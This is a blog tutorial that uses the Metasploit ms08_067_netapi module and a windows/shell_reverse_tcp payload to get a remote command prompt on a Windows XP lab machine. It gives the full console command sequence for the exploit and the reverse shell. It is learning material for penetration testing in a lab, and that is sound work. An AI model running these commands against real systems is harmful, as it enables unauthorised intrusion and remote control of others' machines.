Metasploit/Exploit #1 : Introduction to Metasploit and How to hack Windows command prompt using Metasploit Framework.







   In this tutorial , I want to share on How to Hack Windows Command Prompt using Metasploit. Metasploit works by taking advantage of a system vulnerabilities and taking advantage of it's weakness. Metasploit is equipped with Module and Payload that we can use to take advantage of the system . Metasploit is a great framework with extreme flexibility that we can used to launch an attack. Before I proceed with the hacking tutorial,below are some words terminology that can be used to understand more about Metasploit .

  1. Vulnerability - A known weakness in a targeted system that can be taken advantage of .
  2. Exploit - A actual  code that is used to compromise a system.
  3. Payload - An actual code that will run on the compromise system .(Activity that will be executed on the targeted machine)

 To  use Metasploit for your hacking purposes, I will share on How to hack a Windows command prompt using Metasploit . This test is done in my Virtual Lab . Please check my previous tutorial on How to build a Network  Hacking and Penetration Testing Lab.  I'm using Windows XP Service Pack 2 as my targeted machine .

Steps

  1. Search for Windows Vulnerability module.
  2. Set the Payload.
  3. Exploit.
  4. Check Windows Operating System .

Steps Details

1.Search for Windows Vulnerability module .

We will be using "netapi" module to exploit Windows XP. This module is written by security researcher to take advantage on the system vulnerability . 

1.1) Search for Module called"netapi" .



1.2) Use "netapi" module to launch an exploit .
copy the exploit name
Type in  "use exploit/windows/smb/ms08_067_netapi"
use the netapi exploit

Once you are in the netapi module,display the settings by typing 
"show options" .




1.3) Set the RHOST (Remote Host) IP address or targeted machine IP address .My targeted machine IP address is 10.10.10.4 .

Type in "set RHOST 10.10.10.4"
RHOST IP address
10.10.10.4

2.Set the Payload . 

Payload is activity that we want to execute on the targeted machine once it has been compromise. There are few types of Payload that we can use in Metasploit. I will cover more on this in my next and coming tutorial .

2.1) Type in "set PAYLOAD windows/shell_reverse_tcp " .
2.2) Set the Local Host (LHOST) IP address and Local  Port (LPORT)  id.Local port id is the port in which will be used to drop in the payload .In this tutorial, Metasploit will use port "600"

Type in"set LPORT 600"
The LPORT is change from 1234 to 600

3) Exploit . 

3.1) Check the exploit and payload settings by typing 
"show options" .

 3.2) To start the exploitation,

Type"exploit.

Metasploit will execute the exploit and payload which will get you into Windows XP command prompt .
Walla!!

4. Check Windows Operating System .

4.1) When the connection in Metasploit is successful, Open  the Windows  and type in  "netstat"  to see  external connection to the system . 
netstat
connected port 

You can  manipulate  data remotely using the command prompt in your targeted machine .

Previous
Next Post »